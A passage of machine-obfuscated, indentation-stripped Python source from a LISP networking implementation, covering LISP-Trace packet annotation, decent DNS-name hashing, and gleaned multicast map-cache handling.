if 85 - 85: i11iIiiIii - i11iIiiIii - OoOoOO00 / II111iiii - II111iiii
def lisp_get_decent_index ( eid ) :
I11i11i1 = eid . print_prefix ( )
IIii1IiiiiI1I = hashlib . sha256 ( I11i11i1 ) . hexdigest ( )
ooo = int ( IIii1IiiiiI1I , 16 ) % lisp_decent_modulus
return ( ooo )
if 66 - 66: OoOoOO00 . OoooooooOO
if 24 - 24: iIii1I11I1II1 + OOooOOo * iII111i % IiII % OOooOOo
if 64 - 64: IiII . I1ii11iIi11i - o0oOOo0O0Ooo - ooOoO0o + OoooooooOO
if 95 - 95: iII111i . I1ii11iIi11i + ooOoO0o + o0oOOo0O0Ooo % OoO0O00
if 50 - 50: iII111i * O0 % II111iiii
if 80 - 80: OOooOOo - II111iiii - OoO0O00
if 62 - 62: Ii1I . i11iIiiIii % OOooOOo
def lisp_get_decent_dns_name ( eid ) :
ooo = lisp_get_decent_index ( eid )
return ( str ( ooo ) + "." + lisp_decent_dns_suffix )
if 44 - 44: i1IIi * I1ii11iIi11i % Ii1I . Ii1I * I11i + II111iiii
if 15 - 15: i1IIi - I11i - I1Ii111 / OoO0O00 + Oo0Ooo + I1IiiI
if 81 - 81: IiII
if 54 - 54: I1IiiI % OoO0O00 % OoOoOO00
if 12 - 12: II111iiii . O0 * i11iIiiIii . I11i
if 98 - 98: II111iiii + i1IIi * oO0o % I1IiiI
if 53 - 53: i11iIiiIii . I1ii11iIi11i - OOooOOo - OOooOOo
if 97 - 97: I1IiiI % iII111i % OoooooooOO / ooOoO0o / i11iIiiIii
def lisp_get_decent_dns_name_from_str ( iid , eid_str ) :
OOo0O0O0o0 = lisp_address ( LISP_AFI_NONE , eid_str , 0 , iid )
ooo = lisp_get_decent_index ( OOo0O0O0o0 )
return ( str ( ooo ) + "." + lisp_decent_dns_suffix )
if 7 - 7: O0 % IiII / o0oOOo0O0Ooo
if 79 - 79: IiII + I1Ii111
if 59 - 59: iII111i - oO0o . ooOoO0o / IiII * i11iIiiIii
if 61 - 61: I11i - Oo0Ooo * II111iiii + iIii1I11I1II1
if 37 - 37: OoooooooOO % II111iiii / o0oOOo0O0Ooo . OOooOOo * I1ii11iIi11i . iIii1I11I1II1
if 73 - 73: OoOoOO00
if 44 - 44: Oo0Ooo / oO0o
if 9 - 9: i1IIi % I1IiiI + OoO0O00 * ooOoO0o / iIii1I11I1II1 / iII111i
if 80 - 80: OOooOOo / O0 % IiII * OoOoOO00
if 53 - 53: OOooOOo + i11iIiiIii
def lisp_trace_append ( packet , reason = None , ed = "encap" , lisp_socket = None ,
rloc_entry = None ) :
if 25 - 25: i11iIiiIii
OoO00oo00 = 28 if packet . inner_version == 4 else 48
o00O0OoIIi = packet . packet [ OoO00oo00 : : ]
o0oo0Oo = lisp_trace ( )
if ( o0oo0Oo . decode ( o00O0OoIIi ) == False ) :
lprint ( "Could not decode JSON portion of a LISP-Trace packet" )
return ( False )
if 96 - 96: Oo0Ooo . I11i + II111iiii - I1Ii111
if 45 - 45: i1IIi / iII111i + i11iIiiIii * I11i + ooOoO0o / OoooooooOO
o0000o = "?" if packet . outer_dest . is_null ( ) else packet . outer_dest . print_address_no_iid ( )
if 29 - 29: i1IIi % i1IIi - II111iiii
if 44 - 44: II111iiii . Oo0Ooo - o0oOOo0O0Ooo
if 45 - 45: ooOoO0o - oO0o - I1IiiI
if 21 - 21: OoooooooOO
if 28 - 28: I1ii11iIi11i + oO0o . Oo0Ooo % iIii1I11I1II1 / I1Ii111
if 8 - 8: O0 . I1IiiI * o0oOOo0O0Ooo + I1IiiI
if ( o0000o != "?" and packet . encap_port != LISP_DATA_PORT ) :
if ( ed == "encap" ) : o0000o += ":{}" . format ( packet . encap_port )
if 44 - 44: i1IIi % iII111i . i11iIiiIii / I11i + OoooooooOO
if 21 - 21: OoOoOO00 . OoO0O00 . OoOoOO00 + OoOoOO00
if 30 - 30: I1IiiI - iII111i - OOooOOo + oO0o
if 51 - 51: Ii1I % O0 / II111iiii . Oo0Ooo
if 90 - 90: i11iIiiIii * II111iiii % iIii1I11I1II1 . I1ii11iIi11i / Oo0Ooo . OOooOOo
I1iII11ii1 = { }
I1iII11ii1 [ "node" ] = "ITR" if lisp_i_am_itr else "ETR" if lisp_i_am_etr else "RTR" if lisp_i_am_rtr else "?"
if 77 - 77: OoO0O00
oO00oII111iiI11I1i = packet . outer_source
if ( oO00oII111iiI11I1i . is_null ( ) ) : oO00oII111iiI11I1i = lisp_myrlocs [ 0 ]
I1iII11ii1 [ "srloc" ] = oO00oII111iiI11I1i . print_address_no_iid ( )
if 88 - 88: O0 - O0 / Ii1I - OOooOOo % I11i
if 13 - 13: IiII % OoooooooOO * IiII - OoO0O00 % OoooooooOO * IiII
if 91 - 91: ooOoO0o * ooOoO0o % I1Ii111 . I1ii11iIi11i + iII111i / oO0o
if 60 - 60: Ii1I
if 27 - 27: I1ii11iIi11i - I11i . OoO0O00 / o0oOOo0O0Ooo
if ( I1iII11ii1 [ "node" ] == "ITR" and packet . inner_sport != LISP_TRACE_PORT ) :
I1iII11ii1 [ "srloc" ] += ":{}" . format ( packet . inner_sport )
if 87 - 87: iIii1I11I1II1 - OOooOOo - OOooOOo
if 55 - 55: Oo0Ooo + OoooooooOO . IiII / O0 + I11i
I1iII11ii1 [ "hn" ] = lisp_hostname
ii1i1I1111ii = ed + "-ts"
I1iII11ii1 [ ii1i1I1111ii ] = lisp_get_timestamp ( )
if 58 - 58: Ii1I
if 35 - 35: OoO0O00 + OoOoOO00
if 22 - 22: II111iiii / I1IiiI + o0oOOo0O0Ooo * I1IiiI . OoooooooOO * OOooOOo
if 49 - 49: I1ii11iIi11i * I1IiiI + OOooOOo + i11iIiiIii * I1ii11iIi11i . o0oOOo0O0Ooo
if 36 - 36: o0oOOo0O0Ooo - i11iIiiIii
if 37 - 37: O0 + IiII + I1IiiI
if ( o0000o == "?" and I1iII11ii1 [ "node" ] == "ETR" ) :
Ooooo00 = lisp_db_for_lookups . lookup_cache ( packet . inner_dest , False )
if ( Ooooo00 != None and len ( Ooooo00 . rloc_set ) >= 1 ) :
o0000o = Ooooo00 . rloc_set [ 0 ] . rloc . print_address_no_iid ( )
if 50 - 50: OoooooooOO . I1Ii111
if 100 - 100: ooOoO0o * ooOoO0o - Ii1I
I1iII11ii1 [ "drloc" ] = o0000o
if 13 - 13: iII111i . I11i * OoO0O00 . i1IIi . iIii1I11I1II1 - o0oOOo0O0Ooo
if 68 - 68: Ii1I % o0oOOo0O0Ooo / OoooooooOO + Ii1I - Ii1I
if 79 - 79: II111iiii / IiII
if 4 - 4: O0 - i11iIiiIii % ooOoO0o * O0 - ooOoO0o
if ( o0000o == "?" and reason != None ) :
I1iII11ii1 [ "drloc" ] += " ({})" . format ( reason )
if 96 - 96: oO0o % II111iiii . Ii1I % OoO0O00 . iIii1I11I1II1 / IiII
if 96 - 96: o0oOOo0O0Ooo / O0 . iIii1I11I1II1 . Ii1I % OOooOOo % II111iiii
if 5 - 5: OoooooooOO / I1Ii111 % I1Ii111 / I1IiiI
if 19 - 19: I1IiiI - ooOoO0o % IiII - o0oOOo0O0Ooo * OOooOOo + I1ii11iIi11i
if 44 - 44: i1IIi
if ( rloc_entry != None ) :
I1iII11ii1 [ "rtts" ] = rloc_entry . recent_rloc_probe_rtts
I1iII11ii1 [ "hops" ] = rloc_entry . recent_rloc_probe_hops
if 85 - 85: I1ii11iIi11i / IiII + oO0o
if 95 - 95: IiII . OoO0O00
if 36 - 36: IiII % Ii1I - OoOoOO00 + OoO0O00 + IiII * Ii1I
if 15 - 15: I1IiiI / O0 % I1ii11iIi11i % OoOoOO00 . OoOoOO00 + iII111i
if 79 - 79: OOooOOo + Ii1I . I1Ii111 / Oo0Ooo / i11iIiiIii / O0
if 28 - 28: i1IIi % OoO0O00 / i1IIi - o0oOOo0O0Ooo
O00oOOOOoOO = packet . inner_source . print_address ( )
I11iIii1i11 = packet . inner_dest . print_address ( )
if ( o0oo0Oo . packet_json == [ ] ) :
OOOiii = { }
OOOiii [ "seid" ] = O00oOOOOoOO
OOOiii [ "deid" ] = I11iIii1i11
OOOiii [ "paths" ] = [ ]
o0oo0Oo . packet_json . append ( OOOiii )
if 97 - 97: II111iiii + O0 . Ii1I + OoooooooOO
if 39 - 39: i11iIiiIii + OoO0O00 + I11i * oO0o + iIii1I11I1II1 % o0oOOo0O0Ooo
if 25 - 25: OoooooooOO
if 78 - 78: oO0o / i11iIiiIii * O0 / OOooOOo % i11iIiiIii % O0
if 86 - 86: IiII
if 26 - 26: IiII - I1Ii111 + i11iIiiIii % ooOoO0o * i11iIiiIii + Oo0Ooo
for OOOiii in o0oo0Oo . packet_json :
if ( OOOiii [ "deid" ] != I11iIii1i11 ) : continue
OOOiii [ "paths" ] . append ( I1iII11ii1 )
break
if 39 - 39: Ii1I - i1IIi + i11iIiiIii
if 21 - 21: IiII
if 76 - 76: o0oOOo0O0Ooo % Oo0Ooo + OoO0O00
if 36 - 36: OOooOOo . oO0o
if 15 - 15: I1IiiI + ooOoO0o - o0oOOo0O0Ooo
if 62 - 62: Ii1I - OOooOOo
if 88 - 88: iIii1I11I1II1 * Oo0Ooo / II111iiii / IiII / OoO0O00 % ooOoO0o
if 19 - 19: I11i * iII111i . O0 * iII111i % I1ii11iIi11i - OoOoOO00
O00OO0oo = False
if ( len ( o0oo0Oo . packet_json ) == 1 and I1iII11ii1 [ "node" ] == "ETR" and
o0oo0Oo . myeid ( packet . inner_dest ) ) :
OOOiii = { }
OOOiii [ "seid" ] = I11iIii1i11
OOOiii [ "deid" ] = O00oOOOOoOO
OOOiii [ "paths" ] = [ ]
o0oo0Oo . packet_json . append ( OOOiii )
O00OO0oo = True
if 99 - 99: I1Ii111 * oO0o - iIii1I11I1II1
if 51 - 51: I1Ii111
if 87 - 87: i11iIiiIii . I1ii11iIi11i % I11i
if 41 - 41: OoO0O00 . Ii1I
if 35 - 35: Ii1I + I1IiiI
if 10 - 10: i11iIiiIii - I1ii11iIi11i . OOooOOo - iIii1I11I1II1 / II111iiii / II111iiii
o0oo0Oo . print_trace ( )
o00O0OoIIi = o0oo0Oo . encode ( )
if 13 - 13: i1IIi - OoooooooOO - OoOoOO00 * ooOoO0o + I11i
if 32 - 32: ooOoO0o - II111iiii * Ii1I
if 99 - 99: O0 + I1Ii111 - I1Ii111 + iII111i
if 4 - 4: i1IIi
if 43 - 43: oO0o * ooOoO0o - I11i
if 70 - 70: oO0o / Ii1I
if 15 - 15: iIii1I11I1II1 % ooOoO0o % i11iIiiIii
if 16 - 16: iII111i
ii1iiIiiI = o0oo0Oo . packet_json [ 0 ] [ "paths" ] [ 0 ] [ "srloc" ]
if ( o0000o == "?" ) :
lprint ( "LISP-Trace return to sender RLOC {}" . format ( ii1iiIiiI ) )
o0oo0Oo . return_to_sender ( lisp_socket , ii1iiIiiI , o00O0OoIIi )
return ( False )
if 40 - 40: iII111i * i1IIi * O0 . oO0o
if 29 - 29: i1IIi . OoOoOO00 . i1IIi + oO0o . I1Ii111 + O0
if 62 - 62: I1ii11iIi11i . IiII + OoO0O00 - OoOoOO00 * O0 + I1Ii111
if 58 - 58: oO0o . OoO0O00 / ooOoO0o
if 61 - 61: I11i + I1Ii111
if 27 - 27: ooOoO0o / i1IIi . oO0o - OoooooooOO
O0OOOOo0 = o0oo0Oo . packet_length ( )
if 48 - 48: ooOoO0o % ooOoO0o / OoooooooOO + i1IIi * oO0o + ooOoO0o
if 69 - 69: iII111i . iII111i
if 46 - 46: IiII * Oo0Ooo + I1Ii111
if 79 - 79: IiII
if 89 - 89: IiII * I11i + I1ii11iIi11i * oO0o - II111iiii
if 58 - 58: ooOoO0o . I1Ii111 / i1IIi % I1ii11iIi11i + o0oOOo0O0Ooo
Ooo0O00 = packet . packet [ 0 : OoO00oo00 ]
III1I1Iii1 = struct . pack ( "HH" , socket . htons ( O0OOOOo0 ) , 0 )
Ooo0O00 = Ooo0O00 [ 0 : OoO00oo00 - 4 ] + III1I1Iii1
if ( packet . inner_version == 6 and I1iII11ii1 [ "node" ] == "ETR" and
len ( o0oo0Oo . packet_json ) == 2 ) :
o0oOo00 = Ooo0O00 [ OoO00oo00 - 8 : : ] + o00O0OoIIi
o0oOo00 = lisp_udp_checksum ( O00oOOOOoOO , I11iIii1i11 , o0oOo00 )
Ooo0O00 = Ooo0O00 [ 0 : OoO00oo00 - 8 ] + o0oOo00 [ 0 : 8 ]
if 96 - 96: Ii1I * i11iIiiIii - OOooOOo - O0 * OoooooooOO - ooOoO0o
if 35 - 35: iII111i . i11iIiiIii - OOooOOo % Oo0Ooo + Ii1I . iIii1I11I1II1
if 91 - 91: o0oOOo0O0Ooo / OoO0O00 + I1IiiI % i11iIiiIii % i1IIi
if 22 - 22: I1Ii111 * O0 % OoO0O00 * I1ii11iIi11i
if 47 - 47: OoO0O00 / OOooOOo / OoOoOO00 % i11iIiiIii / OoOoOO00
if 52 - 52: ooOoO0o / I11i % i11iIiiIii - I1Ii111 % ooOoO0o - o0oOOo0O0Ooo
if ( O00OO0oo ) :
if ( packet . inner_version == 4 ) :
Ooo0O00 = Ooo0O00 [ 0 : 12 ] + Ooo0O00 [ 16 : 20 ] + Ooo0O00 [ 12 : 16 ] + Ooo0O00 [ 22 : 24 ] + Ooo0O00 [ 20 : 22 ] + Ooo0O00 [ 24 : : ]
if 67 - 67: OoOoOO00 / I1Ii111 + i11iIiiIii - IiII
else :
Ooo0O00 = Ooo0O00 [ 0 : 8 ] + Ooo0O00 [ 24 : 40 ] + Ooo0O00 [ 8 : 24 ] + Ooo0O00 [ 42 : 44 ] + Ooo0O00 [ 40 : 42 ] + Ooo0O00 [ 44 : : ]
if 79 - 79: I11i . I11i - OoOoOO00
if 86 - 86: OoO0O00 * Oo0Ooo . iIii1I11I1II1 * O0
OooOOOoOoo0O0 = packet . inner_dest
packet . inner_dest = packet . inner_source
packet . inner_source = OooOOOoOoo0O0
if 52 - 52: iII111i - i11iIiiIii + o0oOOo0O0Ooo + i1IIi
if 58 - 58: OOooOOo - Ii1I * I1Ii111 - O0 . oO0o
if 72 - 72: i1IIi * iII111i * Ii1I / o0oOOo0O0Ooo . I1Ii111 + i11iIiiIii
if 33 - 33: I11i / OoO0O00 * ooOoO0o + iIii1I11I1II1
if 54 - 54: Oo0Ooo / IiII + i11iIiiIii . O0
OoO00oo00 = 2 if packet . inner_version == 4 else 4
Oo00oo = 20 + O0OOOOo0 if packet . inner_version == 4 else O0OOOOo0
i1I1ii111 = struct . pack ( "H" , socket . htons ( Oo00oo ) )
Ooo0O00 = Ooo0O00 [ 0 : OoO00oo00 ] + i1I1ii111 + Ooo0O00 [ OoO00oo00 + 2 : : ]
if 54 - 54: Oo0Ooo
if 26 - 26: II111iiii
if 15 - 15: OoooooooOO * oO0o
if 53 - 53: OoO0O00 * i1IIi / Oo0Ooo / OoO0O00 * ooOoO0o
if ( packet . inner_version == 4 ) :
Ooo0OO00oo = struct . pack ( "H" , 0 )
Ooo0O00 = Ooo0O00 [ 0 : 10 ] + Ooo0OO00oo + Ooo0O00 [ 12 : : ]
i1I1ii111 = lisp_ip_checksum ( Ooo0O00 [ 0 : 20 ] )
Ooo0O00 = i1I1ii111 + Ooo0O00 [ 20 : : ]
if 77 - 77: iIii1I11I1II1 % I1IiiI + o0oOOo0O0Ooo + I1Ii111 * Oo0Ooo * i1IIi
if 14 - 14: iIii1I11I1II1 * iIii1I11I1II1 - OOooOOo . iII111i / ooOoO0o
if 54 - 54: OoOoOO00 - I1IiiI - iII111i
if 49 - 49: i11iIiiIii * Oo0Ooo
if 100 - 100: Oo0Ooo * oO0o
packet . packet = Ooo0O00 + o00O0OoIIi
return ( True )
if 85 - 85: OoooooooOO . IiII / IiII . ooOoO0o . IiII % II111iiii
if 65 - 65: oO0o - OoO0O00 / iII111i + ooOoO0o
if 80 - 80: o0oOOo0O0Ooo + II111iiii * Ii1I % OoOoOO00 % I1IiiI + I1ii11iIi11i
if 46 - 46: Oo0Ooo / Oo0Ooo % iII111i % I1IiiI
if 85 - 85: OoO0O00 - Ii1I / O0
if 45 - 45: IiII + I1Ii111 / I11i
if 84 - 84: iII111i % II111iiii
if 86 - 86: IiII % II111iiii / i1IIi * I1ii11iIi11i - O0 * OOooOOo
if 53 - 53: OOooOOo * oO0o + i1IIi % Oo0Ooo + II111iiii
if 34 - 34: oO0o % iII111i / IiII . IiII + i11iIiiIii
def lisp_allow_gleaning ( eid , group , rloc ) :
if ( lisp_glean_mappings == [ ] ) : return ( False , False , False )
if 68 - 68: O0 % oO0o * IiII % O0
for I1iII11ii1 in lisp_glean_mappings :
if ( I1iII11ii1 . has_key ( "instance-id" ) ) :
o0OoO0000o = eid . instance_id
iii11Ii , O0OO0OO0 = I1iII11ii1 [ "instance-id" ]
if ( o0OoO0000o < iii11Ii or o0OoO0000o > O0OO0OO0 ) : continue
if 55 - 55: O0 % I1IiiI % O0
if ( I1iII11ii1 . has_key ( "eid-prefix" ) ) :
oOo = copy . deepcopy ( I1iII11ii1 [ "eid-prefix" ] )
oOo . instance_id = eid . instance_id
if ( eid . is_more_specific ( oOo ) == False ) : continue
if 27 - 27: I1IiiI + I1ii11iIi11i * I1Ii111 % Ii1I - Oo0Ooo
if ( I1iII11ii1 . has_key ( "group-prefix" ) ) :
if ( group == None ) : continue
i11ii = copy . deepcopy ( I1iII11ii1 [ "group-prefix" ] )
i11ii . instance_id = group . instance_id
if ( group . is_more_specific ( i11ii ) == False ) : continue
if 87 - 87: i11iIiiIii % OOooOOo - OoOoOO00 * ooOoO0o / Oo0Ooo
if ( I1iII11ii1 . has_key ( "rloc-prefix" ) ) :
if ( rloc != None and rloc . is_more_specific ( I1iII11ii1 [ "rloc-prefix" ] )
== False ) : continue
if 74 - 74: OoooooooOO * ooOoO0o - I11i / I1ii11iIi11i % iIii1I11I1II1
return ( True , I1iII11ii1 [ "rloc-probe" ] , I1iII11ii1 [ "igmp-query" ] )
if 94 - 94: Ii1I * I1Ii111 + OoOoOO00 . iIii1I11I1II1
return ( False , False , False )
if 44 - 44: Oo0Ooo . Oo0Ooo * Oo0Ooo
if 23 - 23: I1Ii111 / iII111i . O0 % II111iiii
if 67 - 67: I11i / iIii1I11I1II1 / ooOoO0o
if 90 - 90: II111iiii % I1Ii111 - IiII . Oo0Ooo % OOooOOo - OoOoOO00
if 89 - 89: Oo0Ooo - I1ii11iIi11i . I1Ii111
if 65 - 65: ooOoO0o % OOooOOo + OOooOOo % I1Ii111 . I1IiiI % O0
if 46 - 46: OoO0O00 * I1Ii111 + iII111i . oO0o % OOooOOo / i11iIiiIii
def lisp_build_gleaned_multicast ( seid , geid , rloc , port , igmp ) :
iI1i1iIi1iiII = geid . print_address ( )
IIIiiIiiI1i = seid . print_address_no_iid ( )
IiII1iiI = green ( "{}" . format ( IIIiiIiiI1i ) , False )
oOo = green ( "(*, {})" . format ( iI1i1iIi1iiII ) , False )
i11iII1IiI = red ( rloc . print_address_no_iid ( ) + ":" + str ( port ) , False )
if 71 - 71: iII111i % o0oOOo0O0Ooo
if 91 - 91: i11iIiiIii * iIii1I11I1II1 % oO0o . II111iiii / Ii1I + Ii1I
if 32 - 32: OOooOOo % OOooOOo + I1ii11iIi11i / Ii1I - i11iIiiIii
if 28 - 28: iIii1I11I1II1 - II111iiii
IiiiiII1i = lisp_map_cache_lookup ( seid , geid )
if ( IiiiiII1i == None ) :
IiiiiII1i = lisp_mapping ( "" , "" , [ ] )
IiiiiII1i . group . copy_address ( geid )
IiiiiII1i . eid . copy_address ( geid )
IiiiiII1i . eid . address = 0
IiiiiII1i . eid . mask_len = 0
IiiiiII1i . mapping_source . copy_address ( rloc )
IiiiiII1i . map_cache_ttl = LISP_IGMP_TTL
IiiiiII1i . gleaned = True
IiiiiII1i . add_cache ( )
lprint ( "Add gleaned EID {} to map-cache" . format ( oOo ) )
if 36 - 36: ooOoO0o . II111iiii - OoOoOO00 % I1ii11iIi11i * O0
if 91 - 91: iII111i + Oo0Ooo / OoooooooOO * iIii1I11I1II1 - OoO0O00
if 73 - 73: iIii1I11I1II1 % I1Ii111 % II111iiii * Oo0Ooo * OoO0O00
if 48 - 48: OOooOOo * i11iIiiIii - i11iIiiIii + iIii1I11I1II1 + I1IiiI % OoooooooOO
if 61 - 61: i1IIi
if 56 - 56: iIii1I11I1II1 / I11i * iII111i * I11i * OoooooooOO
iIII = II1II1i1 = iIIII1iiIII = None
if ( IiiiiII1i . rloc_set != [ ] ) :
iIII = IiiiiII1i . rloc_set [ 0 ]
if ( iIII . rle ) :
II1II1i1 = iIII . rle
for oO0Oo0oooO in II1II1i1 . rle_nodes :
if ( oO0Oo0oooO . rloc_name != IIIiiIiiI1i ) : continue
iIIII1iiIII = oO0Oo0oooO
break
if 20 - 20: i11iIiiIii - i1IIi . II111iiii . OOooOOo * I1IiiI
if 91 - 91: Ii1I - OoO0O00 % Ii1I - II111iiii / IiII * OoO0O00
if 42 - 42: IiII
if 83 - 83: i1IIi * o0oOOo0O0Ooo / OoO0O00 / o0oOOo0O0Ooo
if 55 - 55: Oo0Ooo % O0 - OoO0O00
if 42 - 42: OoooooooOO * OOooOOo
if 93 - 93: OOooOOo + II111iiii . oO0o * Oo0Ooo - O0 + I1Ii111
if ( iIII == None ) :
iIII = lisp_rloc ( )
IiiiiII1i . rloc_set = [ iIII ]
iIII . priority = 253
iIII . mpriority = 255
IiiiiII1i . build_best_rloc_set ( )
if 99 - 99: OoO0O00 * o0oOOo0O0Ooo + OoOoOO00 * iIii1I11I1II1
if ( II1II1i1 == None ) :
II1II1i1 = lisp_rle ( geid . print_address ( ) )
iIII . rle = II1II1i1
if 38 - 38: I1ii11iIi11i - OOooOOo * O0 - I1ii11iIi11i
if ( iIIII1iiIII == None ) :
iIIII1iiIII = lisp_rle_node ( )
iIIII1iiIII . rloc_name = IIIiiIiiI1i
II1II1i1 . rle_nodes . append ( iIIII1iiIII )
II1II1i1 . build_forwarding_list ( )
lprint ( "Add RLE {} from {} for gleaned EID {}" . format ( i11iII1IiI , IiII1iiI , oOo ) )
elif ( rloc . is_exact_match ( iIIII1iiIII . address ) == False or
port != iIIII1iiIII . translated_port ) :
lprint ( "Changed RLE {} from {} for gleaned EID {}" . format ( i11iII1IiI , IiII1iiI , oOo ) )
if 95 - 95: OoO0O00 . oO0o . OoooooooOO - iIii1I11I1II1
if 35 - 35: o0oOOo0O0Ooo / OoooooooOO - i1IIi * iIii1I11I1II1 + ooOoO0o
if 66 - 66: Oo0Ooo - OoOoOO00 . I1Ii111 + O0 + o0oOOo0O0Ooo
if 36 - 36: II111iiii % IiII . i11iIiiIii
if 88 - 88: Oo0Ooo . IiII * Oo0Ooo
iIIII1iiIII . store_translated_rloc ( rloc , port )
if 92 - 92: I1IiiI % IiII
if 95 - 95: OoooooooOO / OoO0O00 % O0 / I1Ii111 * Ii1I + I1ii11iIi11i
if 7 - 7: ooOoO0o
if 83 - 83: oO0o / I1Ii111 + I1Ii111 * I1ii11iIi11i
if 8 - 8: I11i . I1ii11iIi11i % i1IIi + Ii1I
if ( igmp ) :
O0oOo0o = seid . print_address ( )
if ( lisp_gleaned_groups . has_key ( O0oOo0o ) == False ) :
lisp_gleaned_groups [ O0oOo0o ] = { }
if 63 - 63: I1IiiI / OoooooooOO
lisp_gleaned_groups [ O0oOo0o ] [ iI1i1iIi1iiII ] = lisp_get_timestamp ( )
if 16 - 16: OoOoOO00
if 67 - 67: O0 . I1Ii111
if 42 - 42: OoOoOO00 % I1ii11iIi11i * I1Ii111 * i1IIi . i1IIi % OOooOOo
if 90 - 90: oO0o * Oo0Ooo * oO0o . Ii1I * i1IIi
if 47 - 47: OOooOOo
if 38 - 38: I11i
if 15 - 15: OoO0O00 / ooOoO0o . OoO0O00 - iIii1I11I1II1 + OoooooooOO - OoO0O00
if 44 - 44: O0 . OOooOOo . o0oOOo0O0Ooo . I1ii11iIi11i - II111iiii
def lisp_remove_gleaned_multicast ( seid , geid ) :
if 71 - 71: I1ii11iIi11i + o0oOOo0O0Ooo . i11iIiiIii * oO0o . i1IIi
if 40 - 40: OoO0O00 - IiII
if 43 - 43: I1Ii111 + i11iIiiIii % iII111i % I1Ii111 - ooOoO0o
if 85 - 85: IiII % iIii1I11I1II1 . I1Ii111
IiiiiII1i = lisp_map_cache_lookup ( seid , geid )
if ( IiiiiII1i == None ) : return
if 38 - 38: iII111i - I1IiiI / ooOoO0o
i1I1Ii11II1i = IiiiiII1i . rloc_set [ 0 ] . rle
if ( i1I1Ii11II1i == None ) : return
if 46 - 46: OOooOOo . O0 / i11iIiiIii . OOooOOo
IiIi1I1i1iII = seid . print_address_no_iid ( )
OOo00oO0oo = False
for iIIII1iiIII in i1I1Ii11II1i . rle_nodes :
if ( iIIII1iiIII . rloc_name == IiIi1I1i1iII ) :
OOo00oO0oo = True
break
if 19 - 19: I11i / Oo0Ooo + I1Ii111
if 43 - 43: I1ii11iIi11i
if ( OOo00oO0oo == False ) : return
if 18 - 18: I11i / OOooOOo % I11i - o0oOOo0O0Ooo
if 22 - 22: iII111i
if 88 - 88: I11i + OoOoOO00 % IiII % OoO0O00 * O0 / OoooooooOO
if 83 - 83: IiII + I1Ii111 . I1ii11iIi11i * iIii1I11I1II1
i1I1Ii11II1i . rle_nodes . remove ( iIIII1iiIII )
i1I1Ii11II1i . build_forwarding_list ( )
if 9 - 9: ooOoO0o % IiII - OoOoOO00
iI1i1iIi1iiII = geid . print_address ( )
O0oOo0o = seid . print_address ( )
IiII1iiI = green ( "{}" . format ( O0oOo0o ) , False )
oOo = green ( "(*, {})" . format ( iI1i1iIi1iiII ) , False )
lprint ( "Gleaned EID {} RLE removed for {}" . format ( oOo , IiII1iiI ) )
if 66 - 66: oO0o % Oo0Ooo
if 40 - 40: i11iIiiIii . O0 * I11i - oO0o / OOooOOo . oO0o
if 86 - 86: OOooOOo - I1Ii111 * IiII - i1IIi + ooOoO0o + I11i
if 32 - 32: IiII
if ( lisp_gleaned_groups . has_key ( O0oOo0o ) ) :
if ( lisp_gleaned_groups [ O0oOo0o ] . has_key ( iI1i1iIi1iiII ) ) :
lisp_gleaned_groups [ O0oOo0o ] . pop ( iI1i1iIi1iiII )
if 99 - 99: II111iiii
if 34 - 34: OOooOOo + OoOoOO00 * o0oOOo0O0Ooo + I1ii11iIi11i + IiII * i1IIi
if 73 - 73: I1ii11iIi11i - IiII - O0 . oO0o + Oo0Ooo % iII111i
if 68 - 68: I1ii11iIi11i - OoooooooOO
if 5 - 5: I1ii11iIi11i * I1IiiI + OoooooooOO / Oo0Ooo
if 18 - 18: OoO0O00 * iII111i % I1IiiI . OOooOOo * o0oOOo0O0Ooo
if ( i1I1Ii11II1i . rle_nodes == [ ] ) :
IiiiiII1i . delete_cache ( )
lprint ( "Gleaned EID {} remove, no more RLEs" . format ( oOo ) )
if 58 - 58: iII111i . IiII + iIii1I11I1II1
if 13 - 13: oO0o * I1Ii111 / I1Ii111 . I1IiiI
if 93 - 93: I11i % OoOoOO00 - OOooOOo + iIii1I11I1II1 / OoooooooOO % i11iIiiIii
if 90 - 90: oO0o % iIii1I11I1II1 + o0oOOo0O0Ooo - I11i / i11iIiiIii
if 57 - 57: I1IiiI . Oo0Ooo / I1IiiI / II111iiii - I1Ii111
if 68 - 68: I1IiiI
if 97 - 97: Ii1I + o0oOOo0O0Ooo / OoO0O00
if 97 - 97: i11iIiiIii % iIii1I11I1II1 + II111iiii
def lisp_change_gleaned_multicast ( seid , rloc , port ) :
O0oOo0o = seid . print_address ( )
if ( lisp_gleaned_groups . has_key ( O0oOo0o ) == False ) : return
if 90 - 90: OOooOOo / I1IiiI
for O0o00oOOOO00 in lisp_gleaned_groups [ O0oOo0o ] :
lisp_geid . store_address ( O0o00oOOOO00 )
lisp_build_gleaned_multicast ( seid , lisp_geid , rloc , port , False )
if 28 - 28: OoooooooOO + i1IIi
if 29 - 29: Oo0Ooo
if 98 - 98: OOooOOo / Oo0Ooo % Ii1I * OoooooooOO - oO0o
if 64 - 64: I1IiiI - I1IiiI
if 90 - 90: iII111i - I1IiiI - II111iiii / OOooOOo + Ii1I
if 34 - 34: i11iIiiIii + I1Ii111 / O0 / iIii1I11I1II1 * OoooooooOO % Ii1I
if 32 - 32: i11iIiiIii - OoOoOO00 / iIii1I11I1II1 * o0oOOo0O0Ooo % I1IiiI + O0
if 36 - 36: I1ii11iIi11i + I1ii11iIi11i % I1Ii111 * ooOoO0o * OoOoOO00
if 54 - 54: Oo0Ooo - I1IiiI % OOooOOo . I1ii11iIi11i / I1IiiI
if 75 - 75: OOooOOo - O0 % iII111i . Ii1I % I1ii11iIi11i + I1ii11iIi11i
if 32 - 32: Ii1I + II111iiii * IiII
if 9 - 9: I1Ii111
if 96 - 96: I1Ii111 / iIii1I11I1II1
if 48 - 48: iII111i * IiII + OoooooooOO
if 63 - 63: I1IiiI / Ii1I
if 31 - 31: i1IIi - oO0o
if 99 - 99: iII111i - i11iIiiIii + oO0o
if 66 - 66: Oo0Ooo * I11i . iIii1I11I1II1 - OoO0O00
if 11 - 11: I1Ii111 + iIii1I11I1II1 * O0 * Oo0Ooo
if 66 - 66: OoooooooOO % OoO0O00 + i11iIiiIii + I1Ii111 % OoO0O00
if 80 - 80: Oo0Ooo - Ii1I
if 54 - 54: O0 - iIii1I11I1II1 . OoO0O00 . IiII % OoO0O00
if 28 - 28: O0 % i1IIi % OoO0O00 / o0oOOo0O0Ooo . iIii1I11I1II1 - iII111i
if 50 - 50: o0oOOo0O0Ooo + iII111i / i1IIi % II111iiii
if 61 - 61: IiII
if 5 - 5: OOooOOo % iIii1I11I1II1 % O0 * i11iIiiIii / I1Ii111
if 48 - 48: IiII * oO0o
